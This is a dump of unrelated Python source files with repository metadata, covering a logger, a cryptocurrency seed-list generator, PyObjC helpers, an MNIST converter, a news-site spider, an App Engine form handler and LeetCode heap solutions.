with open(self.log_files[self.active_log_file], "r") as log_f:
return log_f.read()
@property
def active_log_file(self):
return self._active_log_file
@active_log_file.setter
@accepts(str)
def active_log_file(self, file_name):
if file_name not in self.log_files:
self.new_log_file(file_name)
self._active_log_file = file_name
def _add_to_log(self, *args, no_print=False, **kwargs):
if self.print_to_screen and not no_print:
self.print_f(*args, **kwargs)
with open(self.log_files[self.active_log_file], "a") as log_file:
self.print_f(*args, file=log_file, **kwargs)
def _log(self, caller, print_calling_owerwrite=None, *args, **kwargs):
if caller != self.currently_logging[self.active_log_file]:
self.currently_logging[self.active_log_file] = caller
if print_calling_owerwrite is not None:
print_calling = print_calling_owerwrite
else:
print_calling = self.print_calling_method
if print_calling:
self._add_to_log("%s\n>>> Logged by: %s" % (self.separator,
self.currently_logging[self.active_log_file]))
self._add_to_log(*args, **kwargs)
def __call__(self, *args, print_calling_method=None, **kwargs):
caller = inspect.stack()[1]
caller = "'%s' in '%s'" % (caller[3], caller[1].rpartition("/")[2])
self._log(caller, print_calling_method, *args, **kwargs)
def __enter__(self):
"""
Context manager
Sets logger as global print function within context
"""
__builtins__["print"] = self
return self
def __exit__(self, *args):
"""
Revert to default print function in global scope
"""
__builtins__["print"] = self.print_f
return self
|
[
"[email protected]"
] | |
0637d34c345649b17b190752d77694ce2c4b4bb1
|
57c697ffebe2e9b3f5bd5da8122638152e4d0e9f
|
/contrib/seeds/makeseeds.py
|
4b8d889c83c3bb295de84aab0658b5cb0d5ef45c
|
[
"MIT"
] |
permissive
|
Globycoin/glbcore
|
4039ddb98dec19dadebf8b2d583f27e6c083d9cd
|
d5dd9b5475915956849658373d8658286a08781b
|
refs/heads/master
| 2020-03-22T20:02:44.733133 | 2018-11-15T00:42:39 | 2018-11-15T00:42:39 | 140,569,343 | 3 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,519 |
py
|
#!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate seeds.txt from Pieter's DNS seeder
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 615801
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
""
}
import re
import sys
import dns.resolver
import collections
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(r"^(/GlobycoinCore:2.2.(0|1|99)/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
m = PATTERN_IPV4.match(sline[0])
sortkey = None
ip = None
if m is None:
m = PATTERN_IPV6.match(sline[0])
if m is None:
m = PATTERN_ONION.match(sline[0])
if m is None:
return None
else:
net = 'onion'
ipstr = sortkey = m.group(1)
port = int(m.group(2))
else:
net = 'ipv6'
if m.group(1) in ['::']: # Not interested in localhost
return None
ipstr = m.group(1)
sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
port = int(m.group(2))
else:
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
net = 'ipv4'
sortkey = ip
ipstr = m.group(1)
port = int(m.group(6))
# Skip bad results.
if sline[1] == 0:
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
if len(sline) > 11:
agent = sline[11][1:] + sline[12][:-1]
else:
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'net': net,
'ip': ipstr,
'port': port,
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
'sortkey': sortkey,
}
def filtermultiport(ips):
'''Filter out hosts with more nodes per IP'''
hist = collections.defaultdict(list)
for ip in ips:
hist[ip['sortkey']].append(ip)
return [value[0] for (key,value) in list(hist.items()) if len(value)==1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
# Sift out ips by type
ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
ips_onion = [ip for ip in ips if ip['net'] == 'onion']
# Filter IPv4 by ASN
result = []
asn_count = {}
for ip in ips_ipv4:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
# TODO: filter IPv6 by ASN
# Add back non-IPv4
result.extend(ips_ipv6)
result.extend(ips_onion)
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
# Skip entries with valid address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
# Filter out hosts with multiple bitcoin ports, these are likely abusive
ips = filtermultiport(ips)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['net'], x['sortkey']))
for ip in ips:
if ip['net'] == 'ipv6':
print('[%s]:%i' % (ip['ip'], ip['port']))
else:
print('%s:%i' % (ip['ip'], ip['port']))
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
f886c22e0fbc3e0a268193239c53656c2954fcc7
|
c54f5a7cf6de3ed02d2e02cf867470ea48bd9258
|
/pyobjc/pyobjc-core/Lib/objc/_category.py
|
acfb9a48e26e38dd13712137c8517c88b442e532
|
[
"MIT"
] |
permissive
|
orestis/pyobjc
|
01ad0e731fbbe0413c2f5ac2f3e91016749146c6
|
c30bf50ba29cb562d530e71a9d6c3d8ad75aa230
|
refs/heads/master
| 2021-01-22T06:54:35.401551 | 2009-09-01T09:24:47 | 2009-09-01T09:24:47 | 16,895 | 8 | 5 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,372 |
py
|
__all__ = ['classAddMethod', 'Category']
from _objc import selector, classAddMethods, objc_class, ivar
from types import FunctionType, MethodType
def classAddMethod(cls, name, method):
"""
Add a single method to a class. 'name' is the ObjC selector
"""
if isinstance(method, selector):
sel = selector(method.callable,
selector=name,
signature=method.signature,
isClassMethod=method.isClassMethod)
else:
sel = selector(method, selector=name)
return classAddMethods(cls, [sel])
#
# Syntactic support for categories
#
class _CategoryMeta(type):
"""
Meta class for categories.
"""
__slots__ = ()
_IGNORENAMES = ('__module__', '__name__', '__doc__')
def _newSubclass(cls, name, bases, methods):
return type.__new__(cls, name, bases, methods)
_newSubclass = classmethod(_newSubclass)
def __new__(cls, name, bases, methods):
if len(bases) != 1:
raise TypeError("Cannot have multiple inheritance with Categories")
c = bases[0].real_class
if c.__name__ != name:
raise TypeError("Category name must be same as class name")
m = [ x[1] for x in methods.iteritems() if x[0] not in cls._IGNORENAMES and isinstance(x[1], (FunctionType, MethodType, selector, classmethod))]
vars = [ x for x in methods.iteritems() if x[0] not in cls._IGNORENAMES and not isinstance(x[1], (FunctionType, MethodType, selector, classmethod))]
for k, v in vars:
if isinstance(v, ivar):
raise TypeError("Cannot add instance variables in a Category")
classAddMethods(c, m)
for k, v in vars:
setattr(c, k, v)
return c
def Category(cls):
"""
Create a category on ``cls``.
Usage:
class SomeClass (Category(SomeClass)):
def method(self):
pass
``SomeClass`` is an existing class that will be rebound to the same
value. The side-effect of this class definition is that the methods
in the class definition will be added to the existing class.
"""
if not isinstance(cls, objc_class):
raise TypeError, "Category can only be used on Objective-C classes"
retval = _CategoryMeta._newSubclass('Category', (), dict(real_class=cls))
return retval
|
[
"ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25"
] |
ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25
|
ab81aec92b4137221d359ec9b7ddacf88e47a00b
|
81e008b746f89d144066ee5589fafa370f37e5a5
|
/1005.py
|
8bf880a472d0444a295f1fb678435685f4c44eb9
|
[] |
no_license
|
osmarsalesjr/SolucoesUriOnlineJudgeEmPython3
|
5c43fb37608ff3d8ff042d94e6b897f4b1d6afb9
|
5de3fa39483fd4ff409efa5981e65daba7744809
|
refs/heads/master
| 2021-01-01T06:40:51.938732 | 2017-08-30T21:46:39 | 2017-08-30T21:46:39 | 97,482,585 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 175 |
py
|
def main():
a = float(input())
b = float(input())
media = ((a * 3.5) + (b * 7.5)) / 11
print("MEDIA = %.5f" % media)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
594f7ee6ba623887c47dbde85e653e5183136971
|
f9886d2b57d92186773d73f59dc0a0e9759b8944
|
/04_bigdata/02_Standardization_Analysis/2.Excel/10_excel_column_by_name_all_worksheets.py
|
c9fc988e32e973138146a52d7b0e7546d7aca05f
|
[] |
no_license
|
Meengkko/bigdata_python2019
|
14bab0da490bd36c693f50b5d924e27f4a8e02ba
|
a28e964ab7cefe612041830c7b1c960f92c42ad5
|
refs/heads/master
| 2022-12-12T15:51:21.448923 | 2019-11-08T03:50:15 | 2019-11-08T03:50:15 | 195,142,241 | 0 | 0 | null | 2022-04-22T22:37:59 | 2019-07-04T00:17:18 |
HTML
|
UTF-8
|
Python
| false | false | 1,894 |
py
|
# 목적: 열의 인덱스 값을 사용하여 특정 열 선택하기
# 라이브러리 호출
import sys
from datetime import date
from xlrd import open_workbook, xldate_as_tuple
from xlwt import Workbook
# 시스템 인자로 인풋/아웃풋 설정
input_file = sys.argv[1] # sales_2013.xlsx
output_file = sys.argv[2] # output_files/10_output_basic.xls
# 워크북클래스, 시트 이름 설정
output_workbook = Workbook()
output_worksheet = output_workbook.add_sheet('selected_columns_all_worksheets')
my_columns = ['Customer Name', 'Sale Amount']
first_worksheet = True
# 파일 오픈 및 1월 데이터 가져오기
with open_workbook(input_file) as workbook:
data = [my_columns]
index_of_cols_to_keep = []
for worksheet in workbook.sheets():
if first_worksheet:
header = worksheet.row_values(0)
for column_index in range(len(header)):
if header[column_index] in my_columns:
index_of_cols_to_keep.append(column_index)
first_worksheet = False
for row_index in range(1, worksheet.nrows):
row_list = []
for column_index in index_of_cols_to_keep:
cell_value = worksheet.cell_value(row_index, column_index)
cell_type = worksheet.cell_type(row_index, column_index)
if cell_type == 3:
date_cell = xldate_as_tuple(cell_value, workbook.datemode)
date_cell = date(*date_cell[0:3]).strftime('%m/%d/%Y')
row_list.append(date_cell)
else:
row_list.append(cell_value)
data.append(row_list)
for list_index, output_list in enumerate(data):
for element_index, element in enumerate(output_list):
output_worksheet.write(list_index, element_index, element)
output_workbook.save(output_file)
|
[
"[email protected]"
] | |
e831918416256c25927fb1be5c435b8555f05dc6
|
577a40ff1c84d28b88a9ade84d265587d28ed2a3
|
/0707/02.py
|
1c05cbec1dfbd4eeaecf48ec375bcfb73a53d48c
|
[] |
no_license
|
bosl95/MachineLearning_Note
|
b167c182fcf5186f6466b8b062cde83b076b0b04
|
934714c5a62e4864f2b5338153c3aaeb3363abe9
|
refs/heads/master
| 2022-12-06T20:58:20.457567 | 2020-09-05T16:18:11 | 2020-09-05T16:18:11 | 279,835,223 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,580 |
py
|
import struct
name = 'train'
maxdata = 1000
path = 'mnist/'
lbl_f = open(path + name + '-labels-idx1-ubyte', 'rb') # 학습정답파일. 바이너리.
img_f = open(path + name + '-images-idx3-ubyte', 'rb')
csv_f = open(path + name + '.csv', 'w', encoding='utf-8')
mag, lbl_count = struct.unpack('>II', lbl_f.read(8)) # 레이블파일에서 매직넘버와 개수를 읽음
print(lbl_count)
mag, img_count = struct.unpack('>II', img_f.read(8)) # 숫자 이미지파일에서 매직넘버와 개수를 읽음
print(mag)
print(img_count)
row, col = struct.unpack('>II', img_f.read(8)) # 숫자 이미지파일에서 이미지 가로, 세로 길이 읽음
print(row)
print(col)
px = row * col # 숫자이미지 한개의 바이트 수(크기)
res = []
for idx in range(lbl_count):
if idx > maxdata: # 1000이 넘으면 break
break
label = struct.unpack("B", lbl_f.read(1))[0] # 정답 파일(레이블)에서 숫자 한개씩 읽음
bdata = img_f.read(px) # 숫자 이미지 파일에서 이미지 한 개 크기만큼 읽어서 bdata에 담음.
sdata = list(map(lambda n: str(n), bdata))
# print(sdata)
csv_f.write(str(label) + ',')
csv_f.write(','.join(sdata) + '\r\n')
if idx < 10: # 이 if 블럭은 써도 되고, 안써도 됨. 이미지를 단위별로 잘 불러오나 확인용
s = 'P2 28 28 255\n'
s += ' '.join(sdata)
iname = path + '{0}-{1}-{2}.pgm'.format(name, idx, label)
with open(iname, 'w', encoding='utf-8') as f:
f.write(s)
csv_f.close()
lbl_f.close()
img_f.close()
|
[
"[email protected]"
] | |
369183498068e8e4659aa370fd0efa60b8a6ebd1
|
72316a1d1a2e0358486d50aeecbac8219ccdf092
|
/ietf/bin/send-milestone-reminders
|
9ed5d254f74bbac1e2488cb1549dcb81cb5f4510
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
algby/ietfdb
|
363541941bd6e806bed70891bed4c7f47c9f0539
|
9ff37e43abbecac873c0362b088a6d9c16f6eed2
|
refs/heads/master
| 2021-01-16T18:57:50.100055 | 2014-09-29T21:16:55 | 2014-09-29T21:16:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,566 |
#!/usr/bin/env python
#
# This script will send various milestone reminders. It's supposed to
# be run daily, and will then send reminders weekly/monthly as
# appropriate.
import datetime, os
import syslog
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ietf.settings")
syslog.openlog(os.path.basename(__file__), syslog.LOG_PID, syslog.LOG_LOCAL0)
from ietf.group.mails import *
today = datetime.date.today()
MONDAY = 1
FIRST_DAY_OF_MONTH = 1
if today.isoweekday() == MONDAY:
# send milestone review reminders - ideally we'd keep track of
# exactly when we sent one last time for a group, but it's a bit
# complicated because people can change the milestones in the mean
# time, so dodge all of this by simply sending once a week only
for g in groups_with_milestones_needing_review():
mail_sent = email_milestone_review_reminder(g, grace_period=7)
if mail_sent:
syslog.syslog("Sent milestone review reminder for %s %s" % (g.acronym, g.type.name))
early_warning_days = 30
# send any milestones due reminders
for g in groups_needing_milestones_due_reminder(early_warning_days):
email_milestones_due(g, early_warning_days)
syslog.syslog("Sent milestones due reminder for %s %s" % (g.acronym, g.type.name))
if today.day == FIRST_DAY_OF_MONTH:
# send milestone overdue reminders - once a month
for g in groups_needing_milestones_overdue_reminder(grace_period=30):
email_milestones_overdue(g)
syslog.syslog("Sent milestones overdue reminder for %s %s" % (g.acronym, g.type.name))
|
[
"[email protected]@7b24d068-2d4e-4fce-9bd7-cbd2762980b0"
] |
[email protected]@7b24d068-2d4e-4fce-9bd7-cbd2762980b0
|
|
8d4e01d63f029ae4f6264c3ec8a2b1b51bacfbc6
|
0fa51edef92cd07033e7d03aa441ae54d8edad2e
|
/news_scrapers/epu_scrapy/spiders/deredactie_spider.py
|
f7aab7c2ba79b7d300fec7f911dcf631998cb515
|
[] |
no_license
|
Datafable/epu-index
|
d86fc108f7e8591cb949fde78f490fd970654bde
|
3f9d24448ff85a8ea6736dbf9da0ec954a3b224b
|
refs/heads/master
| 2020-12-25T18:13:53.397154 | 2018-03-28T09:37:53 | 2018-03-28T09:37:53 | 35,040,805 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,835 |
py
|
import scrapy
from scrapy.contrib.spiders import CrawlSpider
from scrapy.exceptions import CloseSpider
from epu_scrapy.items import Article
from datetime import datetime, timedelta
from time import strptime, strftime, mktime
import re
import json
import os
def set_start_urls(settings):
"""
Based on the dates given in the settings file, construct the start urls for the spider
"""
term = settings['term']
if type(settings['period']) is not dict:
today = datetime.today()
if settings['period'] != 'yesterday':
CloseSpider("unknown period setting. See the scrapers README for more information.")
search_day = today - timedelta(days=1) # search for articles of yesterday
search_day_str = '{0}/{1}/{2}'.format(search_day.day, search_day.month, search_day.year % 100)
start_urls = ['http://deredactie.be/cm/vrtnieuws/1.516538?text={0}&type=text&range=atdate&isdate={1}&sort=date&action=submit&advancedsearch=on'.format(term, search_day_str)]
else:
start = datetime(*strptime(settings['period']['start'], '%Y-%m-%d')[:6]) # awkward syntax to convert struct time to datetime (see: http://stackoverflow.com/questions/1697815/how-do-you-convert-a-python-time-struct-time-object-into-a-datetime-object)
start_str = '{0}/{1}/{2}'.format(start.day, start.month, start.year % 100)
end = datetime(*strptime(settings['period']['end'], '%Y-%m-%d')[:6])
end_str = '{0}/{1}/{2}'.format(end.day, end.month, end.year % 100)
start_urls = ['http://deredactie.be/cm/vrtnieuws/1.516538?text={0}&type=text&range=betweendate&startdate={1}&enddate={2}&sort=date&action=submit&advancedsearch=on'.format(term, start_str, end_str)]
return start_urls
class DeredactieSpider(CrawlSpider):
name = 'deredactie' # name of the spider, to be used when running from command line
allowed_domains = ['deredactie.be']
settings = json.load(open(os.path.join(os.path.dirname(os.path.dirname(__file__)), 'crawling_settings.json')))
start_urls = set_start_urls(settings)
def parse(self, response):
"""
Parse the first search page to determine the number of articles returned. Use the urls offset parameter
to iterate over all response pages and yield scrapy.Request objects that will be parsed with the
parse_list_page function
"""
nr_of_articles_element = response.xpath('//li[contains(concat(" ", normalize-space(@class), " "), " searchcounter ")]')
if len(nr_of_articles_element) is 2:
# nr of articles is mentioned above list of articles and below. So the number of elements that match the xpath selector is 2
nr_of_articles_text = ''.join(nr_of_articles_element[0].xpath('descendant-or-self::*/text()').extract())
# Explaining the regular expression at line 53:
# (?P<offset>\d+) => matches a number (\d+) and assigns it to group "offset"
# (?P<pagesize>\d+) => matches a number (\d+) and assigns it to group "pagesize"
# \s+van\s+ => matches the word "van" surrounded by whitespace (spaces, tabs etc)
# (?P<nr_of_articles>\d+) => matches a number (\d+) and assigns it to group "nr_of_articles"
m = re.search('(?P<offset>\d+)-(?P<pagesize>\d+)\s+van\s+(?P<nr_of_articles>\d+)', nr_of_articles_text)
if m:
pagesize = int(m.group('pagesize')) - int(m.group('offset')) + 1
nr_of_articles = int(m.group('nr_of_articles'))
for i in range(0, nr_of_articles, pagesize):
# Note that the offset parameter starts at 0
yield scrapy.Request(self.start_urls[0] + '&offset={0}'.format(i), callback=self.parse_list_page)
else:
raise scrapy.exceptions.CloseSpider('Could not parse number of articles from {0}'.format(response.url))
else:
raise scrapy.exceptions.CloseSpider('Element containing the number of articles was not found at {0}'.format(response.url))
def parse_published_datetime(self, datetime_element_parts):
"""
Helper method to parse a datetime from a html element
"""
datetime_str_parts = [x.encode('utf-8') for x in datetime_element_parts]
datetime_str = ' '.join(datetime_str_parts).strip()
datetime_str_stripped = re.findall('[0-9]+/[0-9]+/[0-9]+[^0-9]+[0-9]+:[0-9]+', datetime_str)[0]
dt = datetime(*strptime(datetime_str_stripped, '%d/%m/%Y - %H:%M')[0:6])
return dt.isoformat()
def parse_list_page(self, response):
"""
Parse a single page returned by the search query. Find all links referring to articles and yield
scrapy.Request objects for every link found. The parsing of these links is done by the parse_article
function.
"""
print response.url
links = response.xpath('//div[contains(concat(" ", normalize-space(@class), " "), " searchresults ")]/descendant::a/@href').extract()
link_set = set([x.encode('utf-8') for x in links])
for l in link_set:
if l != '#':
# an article link can point to a single article page, or a storyline page, which includes several articles.
# in both cases, the id of the actual article that is pointed to can be found in the url. In the case
# of a storyline, the url is like /cm/vrtnieuws/buitenland/<storylineid>?eid=<articleid> while for a
# single article page, the url is /cm/vrtnieuws/binnenland/<articleid>. Both a storylineid and a articleid
# look something like 1.193019, which will be matched by the regular expression pattern [0-9.]+
article_id = re.findall('[0-9.]+', l)[-1] # the last string that matches this pattern in the url is the article id
l = 'http://deredactie.be/cm/' + article_id
yield scrapy.Request(l, callback=self.parse_article)
def parse_article(self, response):
"""
Parse the article content page
"""
# search for article title
title_parts = response.xpath('//div[@id="articlehead"]/h1/text()').extract()
if len(title_parts) > 0:
title = ' '.join(set(title_parts)).encode('utf-8').strip()
else:
title = ''
# search for article published date
datetime_element_parts = response.xpath('//small[@id="pubdate"]/strong/text()').extract()
if len(datetime_element_parts) > 0:
datetime_iso_str = self.parse_published_datetime(datetime_element_parts)
else:
datetime_iso_str = ''
# search for article intro text
article_intro_parts = response.xpath('//div[@id="intro"]/strong/text()').extract()
article_intro = ' '.join([x.strip() for x in article_intro_parts]).strip()
# search for article full text
article_full_text_fragments = response.xpath('//div[@id="articlebody"]/descendant::p/descendant-or-self::*/text()').extract()
article_full_text = ' '.join([x.strip() for x in article_full_text_fragments]).strip()
# reconstruct the url to the nicely rendered page
url_parts = response.url.split('/')
article_id = url_parts.pop()
url_parts.append('vrtnieuws')
url_parts.append(article_id)
url = '/'.join(url_parts)
# now create an Article item, and return it. All Articles created during scraping can be written to an output file when the -o option is given.
article = Article()
article['url'] = url
article['intro'] = article_intro
article['title'] = title
article['published_at'] = datetime_iso_str
article['text'] = article_full_text
return article
|
[
"[email protected]"
] | |
5bf6d8e5da9416d75daaa4e067ae7119ca58f647
|
c2c6798ced0db33b2669f11f2434596c61496aef
|
/fastparquet/__init__.py
|
38dec432f8c525661a842f3d0a7c473b1fa9f2e3
|
[
"Apache-2.0"
] |
permissive
|
PGryllos/fastparquet
|
e037b0d5e6387746f82e91fd9b4240962f178308
|
07401c501dbfc55c456052413f0c904483c68b50
|
refs/heads/master
| 2020-04-04T19:09:27.392744 | 2018-10-24T18:31:06 | 2018-10-24T18:31:06 | 156,194,372 | 0 | 0 |
Apache-2.0
| 2018-11-05T09:46:52 | 2018-11-05T09:46:52 | null |
UTF-8
|
Python
| false | false | 424 |
py
|
"""parquet - read parquet files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .thrift_structures import parquet_thrift
from .core import read_thrift
from .writer import write
from . import core, schema, converted_types, api
from .api import ParquetFile
from .util import ParquetException
__version__ = "0.1.6"
|
[
"[email protected]"
] | |
2f0a611da567bf2a6e1eedcb7042f1a475d9f211
|
d89a482aaf3001bbc4515f39af9ba474e1ae6062
|
/ubertool/exposure_output.py
|
4a6a41f37b05e878207260f2803b50a2a59f17da
|
[] |
no_license
|
hongtao510/u_tool
|
2925e3694aba81714cf83018c3f8520a7b503228
|
98c962cfb1f53c4971fb2b9ae22c882c0fae6497
|
refs/heads/master
| 2021-01-10T20:40:24.793531 | 2014-03-14T22:57:37 | 2014-03-14T22:57:37 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,183 |
py
|
import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
import webapp2 as webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from google.appengine.api import users
from google.appengine.ext import db
import cgi
import cgitb
cgitb.enable()
import datetime
from ubertool.exposure import Exposure
import logging
class UbertoolExposureConfigurationPage(webapp.RequestHandler):
def post(self):
logger = logging.getLogger("UbertoolExposureConfigurationPage")
form = cgi.FieldStorage()
config_name = str(form.getvalue('config_name'))
user = users.get_current_user()
q = db.Query(Exposure)
q.filter('user =',user)
q.filter("config_name =", config_name)
exposure = q.get()
if exposure is None:
exposure = Exposure()
if user:
logger.info(user.user_id())
exposure.user = user
exposure.config_name = config_name
exposure.cas_number = str(form.getvalue('cas_number'))
exposure.formulated_product_name = form.getvalue('formulated_product_name')
exposure.met_file = form.getvalue('metfile')
exposure.przm_scenario = form.getvalue('PRZM_scenario')
exposure.exams_environment_file = form.getvalue('EXAMS_environment_file')
exposure.application_method = form.getvalue('application_mathod')
exposure.app_type = form.getvalue('app_type')
exposure.weight_of_one_granule = float(form.getvalue('weight_of_one_granule'))
exposure.wetted_in = bool(form.getvalue('wetted_in'))
exposure.incorporation_depth = float(form.getvalue('incorporation_depth'))
exposure.application_kg_rate = float(form.getvalue('application_kg_rate'))
exposure.application_lbs_rate = float(form.getvalue('application_lbs_rate'))
exposure.application_rate_per_use = float(form.getvalue('application_rate_per_use'))
logger.info(form.getvalue("application_date"))
#TODO This is NASTY we should consider using Date Chooser or something with only one valid output
app_data = form.getvalue('application_date')
app_data_parts = app_data.split("-")
exposure.application_date = datetime.date(int(app_data_parts[0]),int(app_data_parts[1]),int(app_data_parts[2]))
exposure.interval_between_applications = float(form.getvalue('interval_between_applications'))
exposure.application_efficiency = float(form.getvalue('application_efficiency'))
exposure.percent_incorporated = float(form.getvalue('percent_incorporated'))
exposure.spray_drift = float(form.getvalue('spray_drift'))
exposure.runoff = float(form.getvalue('runoff'))
exposure.one_in_ten_peak_exposure_concentration = float(form.getvalue('one_in_ten_peak_exposure_concentration'))
exposure.one_in_ten_four_day_average_exposure_concentration = float(form.getvalue('one_in_ten_four_day_average_exposure_concentration'))
exposure.one_in_ten_twentyone_day_average_exposure_concentration = float(form.getvalue('one_in_ten_twentyone_day_average_exposure_concentration'))
exposure.one_in_ten_sixty_day_average_exposure_concentration = float(form.getvalue('one_in_ten_sixty_day_average_exposure_concentration'))
exposure.one_in_ten_ninety_day_average_exposure_concentration = float(form.getvalue('one_in_ten_ninety_day_average_exposure_concentration'))
exposure.maximum_peak_exposure_concentration = float(form.getvalue('maximum_peak_exposure_concentration'))
exposure.maximum_four_day_average_exposure_concentration = float(form.getvalue('maximum_four_day_average_exposure_concentration'))
exposure.maximum_twentyone_day_average_exposure_concentration = float(form.getvalue('maximum_twentyone_day_average_exposure_concentration'))
exposure.maximum_sixty_day_average_exposure_concentration = float(form.getvalue('maximum_sixty_day_average_exposure_concentration'))
exposure.maximum_ninety_day_average_exposure_concentration = float(form.getvalue('maximum_ninety_day_average_exposure_concentration'))
exposure.pore_water_peak_exposure_concentration = float(form.getvalue('pore_water_peak_exposure_concentration'))
exposure.pore_water_four_day_average_exposure_concentration = float(form.getvalue('pore_water_four_day_average_exposure_concentration'))
exposure.pore_water_twentyone_day_average_exposure_concentration = float(form.getvalue('pore_water_twentyone_day_average_exposure_concentration'))
exposure.pore_water_sixty_day_average_exposure_concentration = float(form.getvalue('pore_water_sixty_day_average_exposure_concentration'))
exposure.pore_water_ninety_day_average_exposure_concentration = float(form.getvalue('pore_water_ninety_day_average_exposure_concentration'))
exposure.frac_pest_surface = float(form.getvalue('frac_pest_surface'))
exposure.put()
self.redirect("aquatic_toxicity.html")
app = webapp.WSGIApplication([('/.*', UbertoolExposureConfigurationPage)], debug=True)
def main():
run_wsgi_app(app)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
b0853a9aba65d24c4142d61fcce38fcedb426468
|
2420a09930fcc1a0d3c67a0791be70ddee418f4a
|
/Kth_Largest_Element_in_an_Array.py
|
d08f8e38b151d423cded627522ff355833c7db5b
|
[] |
no_license
|
Superbeet/LeetCode
|
eff8c2562fb5724b89bc2b05ab230a21b67a9e5a
|
a1b14fc7ecab09a838d70e0130ece27fb0fef7fd
|
refs/heads/master
| 2020-04-06T03:34:10.973739 | 2018-02-13T00:57:06 | 2018-02-13T00:57:06 | 42,485,335 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,727 |
py
|
# Use Bubble k times - Time Complexity: O(nk)
class Solution3(object):
def findKthLargest(self, nums, k):
if not nums:
return None
size = len(nums)
for i in xrange(0, k):
for j in xrange(0, size-1-i):
if nums[j]>nums[j+1]:
nums[j],nums[j+1] = nums[j+1], nums[j]
return nums[-k]
# Time complexity: O(k + (n-k)Logk) <~> O(nlogk)
import heapq
class MinHeap(object):
def __init__(self, k):
self.k = k
self.data = []
def push(self, element):
if len(self.data)<self.k:
heapq.heappush(self.data, element)
else:
if element>self.data[0]:
heapq.heapreplace(self.data, element)
def pop(self):
return heapq.heappop(self.data)
class Solution(object):
def findKthLargest(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
if not nums:
return None
size = len(nums)
heap = MinHeap(k)
for i in xrange(0, size):
heap.push(nums[i])
return heap.pop()
# Time: O(n+klogn)
class MaxHeap(object):
def __init__(self, k):
self.k = k
self.data = []
def push(self, element):
element = -element
if len(self.data)<self.k:
heapq.heappush(self.data, element)
else:
if element>self.data[0]:
heapq.heapreplace(self.data, element)
def pop(self):
return -heapq.heappop(self.data)
class Solution2(object):
def findKthLargest(self, nums, k):
if not nums:
return None
size = len(nums)
heap = MaxHeap(size)
for i in xrange(0, size):
heap.push(nums[i])
for j in xrange(k-1):
heap.pop()
return heap.pop()
sol = Solution()
sol2 = Solution2()
sol3 = Solution3()
nums = [3,2,1,5,6,4,11,8,7]
print sol.findKthLargest(nums, 2)
print sol2.findKthLargest(nums, 2)
